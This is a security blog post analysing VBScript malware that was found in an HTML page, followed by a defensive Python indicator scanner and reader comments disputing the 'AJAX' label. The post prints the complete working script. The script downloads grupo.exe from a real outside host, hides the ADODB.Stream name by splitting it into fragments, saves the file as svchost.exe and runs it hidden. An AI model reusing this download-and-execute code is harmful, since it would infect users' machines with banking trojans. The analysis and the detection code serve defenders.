Malware utilizes AJAX to install itself

One of our customers has brought this HTML-based malware to our attention:

[title][/title]
[head][/head]
[body]
[script language="VBScript"]
on error resume next

' due to how ajax works, the file MUST be within the same local domain
dl = "http://grupo-arroba.by.ru/grupo.exe"

' create adodbstream object
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")

a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1

' xml ajax req
str6="GET"
x.Open str6, dl, False
x.Send

' Get temp directory and create our destination name
fname1="svchost.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2) ' Get tmp folder
fname1= F.BuildPath(tmp,fname1)
S.open
' open adodb stream and write contents of request to file
' like vbs dl+exec code
S.write x.responseBody
' Saves it with CreateOverwrite flag
S.savetofile fname1,2

S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
[/script]
[head]
[title][BL4CK] || 404 Not Found[/title]
[/head][body]
[center]
[!-- [script]location.href='http://google.com'[/script] --]
[/body]
[/html]
As can be seen, the malware utilizes AJAX to download http:// grupo-arroba.by.ru/ grupo.exe, which is malware categorized as W32/new-malware!Maximus; that file in turn downloads http:// www.grupo-arroba.by.ru/ grupo.gif, which is another piece of malware, categorized as Win32/Bancos.Variant!Trojan.

This doesn't look like it is exploiting a new vulnerability in Internet Explorer; rather, it uses AJAX to make the downloading and installation of the malware a bit more covert.
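A defender-side check that follows from the analysis above: the script hides the ADODB.Stream name behind concatenated fragments (a1&a2&a3&a4), so a scanner has to fold those string constants before matching. This is an added Python example, not code from the original post; the indicator list and the constructed sample page are mine, and the sample carries no URL or payload.

```python
import re
# Indicators lifted from the sample above: the COM ProgIDs it instantiates, the
# write/execute calls, and the CLSID of the control it abuses to create them.
INDICATORS = ("Microsoft.XMLHTTP", "Adodb.Stream", "Scripting.FileSystemObject",
              "Shell.Application", ".savetofile", ".ShellExecute",
              "BD96C556-65A3-11D0-983A-00C04FC29E36")
# Plain VBScript assignment 'name = rhs' (does not match 'Set x = ...' or 'obj.prop = ...').
ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*(.+?)\s*$', re.M)
def resolve_vbs_strings(script):
    """Constant-fold a1="Ado", a2="db.", s=a1&a2 into {'a1': 'Ado', 'a2': 'db.', 's': 'Adodb.'}."""
    values = {}
    for name, rhs in ASSIGN_RE.findall(script):
        parts = []
        for tok in re.split(r'\s*&\s*', rhs):
            lit = re.fullmatch(r'"([^"]*)"', tok)
            if lit:
                parts.append(lit.group(1))
            elif tok in values:
                parts.append(values[tok])
            else:  # call, number or unknown name: not foldable, skip this assignment
                parts = None
                break
        if parts is not None:
            values[name] = "".join(parts)
    return values

def scan_html(page):
    """Indicators found in the raw page or in its folded string constants (case-insensitive)."""
    folded = " ".join(resolve_vbs_strings(page).values())
    haystack = (page + "\n" + folded).lower()
    return sorted(ind for ind in INDICATORS if ind.lower() in haystack)

def verdict(page):
    """Label the page; 'download-and-execute' once the fetch -> write -> run chain is complete."""
    hits = scan_html(page)
    chain = {"Microsoft.XMLHTTP", "Adodb.Stream", ".ShellExecute"}
    return ("download-and-execute" if chain <= set(hits) else "suspicious" if hits else "clean"), hits
# Constructed sample in the shape of the page's script (no URL, no payload; fname1 is a placeholder).
SAMPLE = '''<script language="VBScript">
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
Set x = df.CreateObject("Microsoft.XMLHTTP","")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
set S = df.createobject(str1,"")
Q.ShellExecute fname1,"","","open",0
</script>'''
```

A plain substring scanner would miss "Adodb.Stream" in the sample entirely; folding the assignments first is what surfaces it, and the chain check keeps a lone XMLHttpRequest on a legitimate page from raising the high-severity label.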

  • http://deleted XML Exploit

    AJAX rux!

  • http://hype-free.blogspot.com/2006/11/hips-just-pretty-ui.html Cd-MaN

    No hype please! The code you published has the same amount to do with ajax as any other script, in other words: nothing!

    The particular thing “exploited” (in fact this isn’t an exploit but a configuration problem) is the fact that the user has a misconfigured Internet Zone in IE (probably from a previous infection) which gives the page enough rights to write to the disk and execute it.

  • KJK::Hyperion

    WELCOME TO TEH INTERNETS!!! this was actively exploited by phishers at least as early as March. Basically the only thing that changes is which faulty ActiveX control is being exploited to create instances of WScript.Shell and ADODB.Stream. A 99.9% bogus list of such controls is used in metasploit, see

  • http://www.BeyondSecurity.com noam

    Just to calm the waters, no HYPE was intended; it was simply stated that AJAX was being used. Why AJAX is new, at least for us, is the fact that AJAX used to download the malware makes ordinary JavaScript scanner/AV work harder :)

  • http://hype-free.blogspot.com/ Cd-MaN

    This is not AJAX! AJAX is Asynchronous JavaScript and XML. The only thing this has in common with any AJAX site is the fact that it creates an XMLHttpRequest object. That’s all. KJK::Hyperion is 100% right that this is almost the same as the ADODB.Stream exploits, only the download methodology changed a little. Why weren’t those labeled “AJAX” exploits? Because they weren’t!

    Please look at the Wikipedia article which describes AJAX (http://en.wikipedia.org/wiki/AJAX). Out of the 4 signs of it (found at the beginning at the article after the “The Ajax technique uses a combination of” text) this exploit satisfies only one. It is not AJAX!

    Thank you.

  • http://deleted XML Exploit

    not AJAX :(

  • http://x-solve.com/blog/?author=19 Kuon

    Not only malware installation but also 0day browser sploits:)

  • http://xmlexploit.com XML Exploit

    AJAX AJAX!, ok just XML :) wait… not even an XML… just plain downloading and executing :)

    Don’t blame the expert, he just posted information he got, did a quick analysis. Bashing doesn’t help!

  • sunshine

    I see it more as a cynical post. Still, even if it wasn’t, it’s sharing data and I am very happy that our user community is here to attack and criticize it, reaching better conclusions.
    That’s what security is all about.

  • LiFe

    Hello,
    My website is influenced with this Malware : ADODB.Stream exploits, and each index.html I uploaded I found this malware is provided inside index.htm. So, how to eliminate this one?